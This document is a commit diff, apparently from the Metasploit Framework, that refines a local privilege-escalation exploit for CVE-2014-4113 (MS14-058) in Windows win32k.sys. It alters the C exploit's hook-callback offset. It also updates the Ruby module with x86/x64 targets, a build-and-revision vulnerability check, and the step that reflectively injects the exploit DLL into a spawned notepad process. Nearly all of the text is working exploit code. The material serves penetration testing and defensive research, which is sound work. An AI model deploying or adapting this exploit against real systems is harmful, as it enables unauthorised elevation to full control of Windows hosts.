More robust check routine for cve-2014-4113

2014-10-27 11:19:12 -04:00 · 2014-10-27 11:19:12 -04:00 · 46b1abac4a
parent 5fa0403ac5
commit 46b1abac4a
2 changed files with 33 additions and 10 deletions
--- a/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
+++ b/external/source/exploits/cve-2014-4113/cve-2014-4113/cve-2014-4113.c
@ -87,7 +87,7 @@ LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
 		HookCallbackClue = 1;
 		if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
 #ifdef _M_X64
-			lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 0x18), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
+			lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
 #else
 			lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
 #endif
--- a/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms14_058_track_popup_menu.rb
@ -48,17 +48,18 @@ class Metasploit3 < Msf::Exploit::Local
          # * Windows 2003 SP2
          # * Windows 7 SP1
          # * Windows 2008
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          # Tested on (64 bits):
-          # * Windows 2008 R2 SP1
          # * Windows 7 SP1
-          [ 'Automatic', { } ],
+          # * Windows 2008 R2 SP1
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
-      'Payload'        =>
+      'Payload'         =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
-      'References'     =>
+      'References'      =>
        [
          ['CVE', '2014-4113'],
          ['OSVDB', '113167'],
@ -78,11 +79,28 @@ class Metasploit3 < Msf::Exploit::Local
      return Exploit::CheckCode::Unknown
    end

+    if sysinfo["Architecture"] =~ /(wow|x)64/i
+      arch = ARCH_X86_64
+    elsif sysinfo["Architecture"] =~ /x86/i
+      arch = ARCH_X86
+    end
+
    file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
    major, minor, build, revision, branch = file_version(file_path)
    vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

-    Exploit::CheckCode::Detected
+    # Neither target suports Windows 8 or 8.1
+    return Exploit::CheckCode::Safe if build == 9200
+    return Exploit::CheckCode::Safe if build == 9600
+
+    if arch == ARCH_X86
+      return Exploit::CheckCode::Vulnerable if [2600, 3790, 7600].include?(build)
+      return Exploit::CheckCode::Vulnerable if revision <= 18577
+    else
+      return Exploit::CheckCode::Vulnerable if build == 7601 && revision <= 18577
+    end
+
+    return Exploit::CheckCode::Unknown
  end

  def exploit
@ -90,11 +108,16 @@ class Metasploit3 < Msf::Exploit::Local
      fail_with(Exploit::Failure::None, 'Session is already elevated')
    end

-    target_arch = ARCH_X86
+    if check != Exploit::CheckCode::Vulnerable
+      fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
+    end
+
    if sysinfo["Architecture"] =~ /wow64/i
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
-    elsif sysinfo["Architecture"] =~ /x64/
-      target_arch = ARCH_X86_64
+    elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
+      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
+    elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
+      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    print_status('Launching notepad to host the exploit...')
@ -110,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
    end

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
-    if target_arch == ARCH_X86
+    if target.arch.first == ARCH_X86
      dll_file_name = 'cve-2014-4113.x86.dll'
    else
      dll_file_name = 'cve-2014-4113.x64.dll'